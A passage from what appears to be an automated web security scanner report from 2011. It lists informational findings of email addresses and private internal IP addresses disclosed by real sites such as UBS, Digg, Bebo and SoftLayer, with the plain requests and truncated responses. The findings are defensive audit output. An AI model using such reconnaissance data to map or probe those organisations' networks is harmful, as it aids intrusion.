...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

18.13. https://manage.softlayer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

sales@softlayer.com
support@softlayer.com

Request

GET / HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.14. https://manage.softlayer.com/Sales/orderComputingInstance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/Sales/orderComputingInstance

Issue detail

The following email addresses were disclosed in the response:

sales@softlayer.com
support@softlayer.com

Request

Response

18.15. https://manage.softlayer.com/index/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/index/index

Issue detail

The following email addresses were disclosed in the response:

sales@softlayer.com
support@softlayer.com

Request

GET /index/index HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.16. https://msnia.login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://msnia.login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12632
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: TK2IDSMLGN1A10 V: 0
Date: Wed, 06 Jul 2011 11:21:32 GMT
Connection: close



<!-- RequestLCID: 1033, Market:EN-US, PrefCountr
...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

18.17. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dna previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/dna

Issue detail

The following email address was disclosed in the response:

onlineservices@ubs.com

Request

GET /olsauth/ex/pbl/ubso/dna HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:07:58 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
pragma: no-cache
cache-control: no-store
expires: Thu, 01 Jan 1970 00:00:00 GMT

<html>

   <HEAD>
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   </HEAD>

   <BODY leftmargin="0" topmargin="0" marginwidth
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.18. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/_security.jsp

Issue detail

The following email address was disclosed in the response:

onlineservices@ubs.com

Request

GET /olsauth/public/SE/OLS/_security.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:10 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

   <HEAD>
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>UBS Financial Services Security Statement</title>
   </head>

   <body leftma
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.19. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/customerPrivacy37.jsp

Issue detail

The following email address was disclosed in the response:

onlineservices@ubs.com

Request

GET /olsauth/public/SE/OLS/customerPrivacy37.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:09 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

<HEAD>
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">

</HEAD>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" link="
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.20. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/importantLegalInformation.jsp

Issue detail

The following email address was disclosed in the response:

onlineservices@ubs.com

Request

GET /olsauth/public/SE/OLS/importantLegalInformation.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:11 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

   <HEAD>
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   </HEAD>

   <BODY leftmargin="0" topmargin="0" marginwid
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.21. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

Issue detail

The following email address was disclosed in the response:

onlineservices@ubs.com

Request

GET /olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

   <HEAD>
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   </HEAD>

   <BODY leftmargin="0" topmargin="0" marginwid
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.22. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/onlinePrivacy37.jsp

Issue detail

The following email address was disclosed in the response:

onlineservices@ubs.com

Request

GET /olsauth/public/SE/OLS/onlinePrivacy37.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:09 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>
   <HEAD>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">

   </HEAD>

   <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" lin
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/privacyStatement37.jsp

Issue detail

The following email address was disclosed in the response:

onlineservices@ubs.com

Request

GET /olsauth/public/SE/OLS/privacyStatement37.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

   <HEAD>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">

   </HEAD>

   <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/security.jsp

Issue detail

The following email address was disclosed in the response:

onlineservices@ubs.com

Request

GET /olsauth/public/SE/OLS/security.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:07 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

   <HEAD>
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>UBS Financial Services Security Statement</title>
   </head>

   <body leftma
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.25. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/staticfiles/olspages/documents/viewPrint.html

Issue detail

The following email address was disclosed in the response:

onlineservices@ubs.com

Request

GET /staticfiles/olspages/documents/viewPrint.html HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
accept-ranges: bytes
connection: close
content-type: text/html
date: Wed, 06 Jul 2011 14:08:13 GMT
etag: "8001-4dfa7d49"
last-modified: Thu, 16 Jun 2011 22:01:45 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 32769

<html>
   <HEAD>
   <LINK href="https://onlineservices.ubs.com/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   <SCRIPT language=javascript
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.26. http://s.bebo.com/js/mootools-core-and-more-1.3.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/js/mootools-core-and-more-1.3.js

Issue detail

The following email addresses were disclosed in the response:

erik@domain.com
espen@domene.no
fred@domain.com
fred@domain.hu
fred@domaine.com
fred@domein.nl
fred@dominio.com
jan@domena.pl
maria@bernasconi.ch
matti@meikalainen.com
max@mustermann.de
name@domain.com
nome@dominio.com

Request

GET /js/mootools-core-and-more-1.3.js?fp=2cf4af889cfa23415c41c8725abb6b9a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
ETag: "ANQNXRn5n1o"
Last-Modified: Mon, 07 Feb 2011 18:15:43 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 316167
Date: Wed, 06 Jul 2011 11:21:59 GMT
Connection: close
Cache-Control: max-age=315360000

/*
---
MooTools: the javascript framework

web build:
- http://mootools.net/core/7c56cfef9dddcf170a5d68e3fb61cfd7

packager build:
- packager build Core/Core Core/Array Core/String Core/Number Core/
...[SNIP]...
lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.google.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these inp
...[SNIP]...
na data valida com {date}",dateInFormatMDY:'Per favor introdueix una data valida com DD/MM/YYYY (p.e. "31/12/1999")',email:'Per favor, introdueix una adre..a de correu electronic valida. Per exemple, "fred@domain.com".',url:"Per favor introdueix una URL valida com http://www.google.com.",currencyDollar:"Per favor introdueix una quantitat valida de .... Per exemple ...100,00 .",oneRequired:"Per favor introdueix alg
...[SNIP]...
SuchAs:"Zadejte pros..m platn.. datum jako {date}",dateInFormatMDY:'Zadejte pros..m platn.. datum jako MM / DD / RRRR (tj. "12/31/1999")',email:'Zadejte pros..m platnou e-mailovou adresu. Nap....klad "fred@domain.com".',url:"Zadejte pros..m platnou URL adresu jako http://www.google.com.",currencyDollar:"Zadejte pros..m platnou ....stku. Nap....klad $100.00.",oneRequired:"Zadejte pros..m alespo.. jednu hodnotu pro
...[SNIP]...
mrum og andre tegn er ikke tilladt.",dateSuchAs:"Skriv en gyldig dato som {date}",dateInFormatMDY:'Skriv dato i formatet DD-MM-YYYY (f.eks. "31-12-1999")',email:'Skriv en gyldig e-mail adresse. F.eks "fred@domain.com".',url:'Skriv en gyldig URL adresse. F.eks "http://www.google.com".',currencyDollar:"Skriv et gldigt bel..b. F.eks Kr.100.00 .",oneRequired:"Et eller flere af felterne i denne formular skal udfyldes."
...[SNIP]...
InFormatMDY:"Geben Sie bitte ein gültiges Datum ein. Wie zum Beispiel TT.MM.JJJJ (z.B. "31.12.1999")",email:"Geben Sie bitte eine gültige E-Mail Adresse ein. Wie zum Beispiel "maria@bernasconi.ch".",url:"Geben Sie bitte eine gültige URL ein. Wie zum Beispiel http://www.google.ch.",currencyDollar:"Geben Sie bitte einen gültigen Betrag in Schweizer Franken ein. Wie zum Beispiel 10
...[SNIP]...
date}").",dateInFormatMDY:"Geben Sie bitte ein gültiges Datum im Format TT.MM.JJJJ ein (z.B. "31.12.1999").",email:"Geben Sie bitte eine gültige E-Mail-Adresse ein (z.B. "max@mustermann.de").",url:"Geben Sie bitte eine gültige URL ein (z.B. "http://www.google.de").",currencyDollar:"Geben Sie bitte einen gültigen Betrag in EURO ein (z.B. 100.00€).",oneRequi
...[SNIP]...
.lida como {date}",dateInFormatMDY:'Por favor ingrese una fecha v..lida, utulizando el formato DD/MM/YYYY (p.e. "31/12/1999")',email:'Por favor, ingrese una direcci..n de e-mail v..lida. Por ejemplo, "fred@dominio.com".',url:"Por favor ingrese una URL v..lida como http://www.google.com.",currencyDollar:"Por favor ingrese una cantidad v..lida de pesos. Por ejemplo $100,00 .",oneRequired:"Por favor ingrese algo para
...[SNIP]...
da como {date}",dateInFormatMDY:'Por favor introduce una fecha válida como DD/MM/YYYY (p.e. "31/12/1999")',email:'Por favor, introduce una dirección de email válida. Por ejemplo, "fred@domain.com".',url:"Por favor introduce una URL válida como http://www.google.com.",currencyDollar:"Por favor introduce una cantidad válida de .... Por ejemplo ...100,00 .",oneRequired:"Por favor in
...[SNIP]...
As:"Palun sisestage kehtiv kuup..ev kujul {date}",dateInFormatMDY:'Palun sisestage kehtiv kuup..ev kujul MM.DD.YYYY (n..iteks: "12.31.1999").',email:'Palun sisestage kehtiv e-maili aadress (n..iteks: "fred@domain.com").',url:"Palun sisestage kehtiv URL (n..iteks: http://www.google.com).",currencyDollar:"Palun sisestage kehtiv $ summa (n..iteks: $100.00).",oneRequired:"Palun sisestage midagi v..hemalt ..hele antud
...[SNIP]...
tMDY:'........ .... .......... .......... .... ...... MM/DD/YYYY ........ ........ (.......... "12/31/1999").',email:'........ .... ........ .......... .......... ........ ......... ........ ........ "fred@domain.com".',url:"........ .... URL .......... .......... http://www.google.com ........ .........",currencyDollar:"........ .... ............ .......... ........ ...... ...... ........ ........ .......... 100.
...[SNIP]...
esimerkiksi {date}",dateInFormatMDY:'Ole hyv.. ja anna kelvollinen p..iv..m....r.. muodossa pp/kk/vvvv (kuten "12/31/1999")',email:'Ole hyv.. ja anna kelvollinen s..hk..postiosoite (kuten esimerkiksi "matti@meikalainen.com").',url:"Ole hyv.. ja anna kelvollinen URL, kuten esimerkiksi http://www.google.fi.",currencyDollar:"Ole hyv.. ja anna kelvollinen eurosumma (kuten esimerkiksi 100,00 EUR) .",oneRequired:"Ole hyv.. ja
...[SNIP]...
e correcte comme {date}",dateInFormatMDY:'Veuillez saisir une date correcte, au format JJ/MM/AAAA (ex : "31/11/1999").',email:'Veuillez saisir une adresse de courrier électronique. Par example "fred@domaine.com".',url:"Veuillez saisir une URL, comme http://www.google.com.",currencyDollar:"Veuillez saisir une quantité correcte. Par example 100,00€.",oneRequired:"Veuillez sélectionner au moi
...[SNIP]...
. ........, ...... {date}",dateInFormatMDY:'.... .......... .......... ........ ............ MM/DD/YYYY (...... "12/31/1999")',email:'.... .......... .......... ............ ........... ............: "fred@domain.com".',url:".... .......... .......... ...... .........., ...... http://www.google.com.",currencyDollar:".... .......... ........ .......... ......... ............ $100.00.",oneRequired:".... .......... .
...[SNIP]...
s d..tum megad..sa sz..ks..ges (pl. {date}).",dateInFormatMDY:'Val..s d..tum megad..sa sz..ks..ges .........HH.NN. form..ban. (pl. "1999.12.31.")',email:'Val..s e-mail c..m megad..sa sz..ks..ges (pl. "fred@domain.hu").',url:"Val..s URL megad..sa sz..ks..ges (pl. http://www.google.com).",currencyDollar:"Val..s p..nz..sszeg megad..sa sz..ks..ges (pl. 100.00 Ft.).",oneRequired:"Az al..bbi mez..k legal..bb egyik..nek
...[SNIP]...
ri.",dateSuchAs:"Inserire una data valida del tipo {date}",dateInFormatMDY:'Inserire una data valida nel formato MM/GG/AAAA (es.: "12/31/1999")',email:'Inserire un indirizzo email valido. Per esempio "nome@dominio.com".',url:'Inserire un indirizzo valido. Per esempio "http://www.dominio.com".',currencyDollar:'Inserire un importo valido. Per esempio "$100.00".',oneRequired:"Completare almeno uno dei campi richiesti.
...[SNIP]...
",dateSuchAs:"Vul een geldige datum in, zoals {date}",dateInFormatMDY:'Vul een geldige datum, in het formaat MM/DD/YYYY (bijvoorbeeld "12/31/1999")',email:'Vul een geldig e-mailadres in. Bijvoorbeeld "fred@domein.nl".',url:"Vul een geldige URL in, zoals http://www.google.nl.",currencyDollar:"Vul een geldig $ bedrag in. Bijvoorbeeld $100.00 .",oneRequired:"Vul iets in bij in ieder geval een van deze velden.",warni
...[SNIP]...
nn en gyldig dato, som {date}",dateInFormatMDY:'Vennligst skriv inn en gyldig dato, i formatet MM/DD/YYYY (for eksempel "12/31/1999")',email:'Vennligst skriv inn en gyldig epost-adresse. For eksempel "espen@domene.no".',url:"Vennligst skriv inn en gyldig URL, for eksempel http://www.google.no.",currencyDollar:"Vennligst fyll ut et gyldig $ bel....p. For eksempel $100.00 .",oneRequired:"Vennligst fyll ut noe i mins
...[SNIP]...
As:"Prosimy poda.. prawid..ow.. dat.. w formacie: {date}",dateInFormatMDY:'Prosimy poda.. poprawn.. date w formacie DD.MM.RRRR (i.e. "12.01.2009")',email:'Prosimy poda.. prawid..owy adres e-mail, np. "jan@domena.pl".',url:"Prosimy poda.. prawid..owy adres URL, np. http://www.google.pl.",currencyDollar:"Prosimy poda.. prawid..ow.. sum.. w PLN. Dla przyk..adu: 100.00 PLN.",oneRequired:"Prosimy wype..ni.. chocia..
...[SNIP]...
dos.",dateSuchAs:"Digite uma data v..lida, como {date}",dateInFormatMDY:'Digite uma data v..lida, como DD/MM/YYYY (por exemplo, "31/12/1999")',email:'Digite um endere..o de email v..lido. Por exemplo "nome@dominio.com".',url:"Digite uma URL v..lida. Exemplo: http://www.google.com.",currencyDollar:"Digite um valor em dinheiro v..lido. Exemplo: R$100,00 .",oneRequired:"Digite algo para pelo menos um desses campos.",e
...[SNIP]...
permitidos.",dateSuchAs:"Digite uma data v..lida, como {date}",dateInFormatMDY:'Digite uma data v..lida, como DD/MM/YYYY (p.ex. "31/12/1999")',email:'Digite um endere..o de email v..lido. Por exemplo "fred@domain.com".',url:"Digite uma URL v..lida, como http://www.google.com.",currencyDollar:"Digite um valor v..lido $. Por exemplo $ 100,00. ",oneRequired:"Digite algo para pelo menos um desses insumos.",errorPrefix
...[SNIP]...
.......... ........ .. .............. ..../..../........ (................ "12/31/1999")',email:'...................., .............. .................... ..........-........... ...... .............. "fred@domain.com".',url:"...................., .............. .................... ............ ........ http://www.google.com.",currencyDollar:"...................., .............. .......... .. ................. ...
...[SNIP]...
.",dateSuchAs:"Prosim, vnesite pravilen datum kot {date}",dateInFormatMDY:'Prosim, vnesite pravilen datum kot MM.DD.YYYY (primer "12.31.1999")',email:'Prosim, vnesite pravilen email naslov. Na primer "fred@domain.com".',url:"Prosim, vnesite pravilen URL kot http://www.google.com.",currencyDollar:"Prosim, vnesit epravilno vrednost .... Primer 100,00... .",oneRequired:"Prosimo, vnesite nekaj za vsaj eno izmed teh po
...[SNIP]...
..r till..tna.",dateSuchAs:"Ange ett giltigt datum som t.ex. {date}",dateInFormatMDY:'Ange ett giltigt datum som t.ex. YYYY-MM-DD (i.e. "1999-12-31")',email:'Ange en giltig e-postadress. Till exempel "erik@domain.com".',url:"Ange en giltig webbadress som http://www.google.com.",currencyDollar:"Ange en giltig belopp. Exempelvis 100,00.",oneRequired:"V..nligen ange minst ett av dessa alternativ.",errorPrefix:"Fel: "
...[SNIP]...
........... ........ .. .............. ..../..../........ (.................. "12/31/2009").',email:'.............. ................ ............ ...................... .......... (.................. "name@domain.com").',url:".............. ................ ................-.................. (.................. http://www.google.com).",currencyDollar:'.............. ........ .. .............. (..................
...[SNIP]...
chAs:".......................................{date}...",dateInFormatMDY:'..........................................YYYY-MM-DD ("2010-12-31")...',email:'................................................"fred@domain.com"...',url:".................. Url ..................http://www.google.com...",currencyDollar:".............................................100.0",oneRequired:"........................",errorPrefix:"...
...[SNIP]...
As:".......................................{date}... ",dateInFormatMDY:'..........................................YYYY-MM-DD ("2010-12-31")... ',email:'................................................"fred@domain.com"... ',url:"..................Url ..................http://www.google.com... ",currencyDollar:".............................................100.0",oneRequired:"........................ ",errorPrefix:".
...[SNIP]...

19. Private IP addresses disclosed previous next
There are 11 instances of this issue:

/
/ajax/submit/crawl
/login
/register
/search
/submit
/submit
/submit
/submit
/topic
/upcoming

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

19.1. http://digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.225

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.2. http://digg.com/ajax/submit/crawl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/ajax/submit/crawl

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.90

Request

GET /ajax/submit/crawl HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=17783 10.2.129.90
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/json
Content-Length: 57

{"event":"digg:error","data":{"message":"Missing Token"}}

19.3. http://digg.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/login

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.225

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.4. http://digg.com/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/register

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.225

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.5. http://digg.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.226

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.6. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.225

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=21932 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8554

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.129.225 Build: 236 - Thu Jun 23 13:57:54 PDT 2011">
...[SNIP]...

19.7. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.76

Request

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27224 10.2.129.76
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
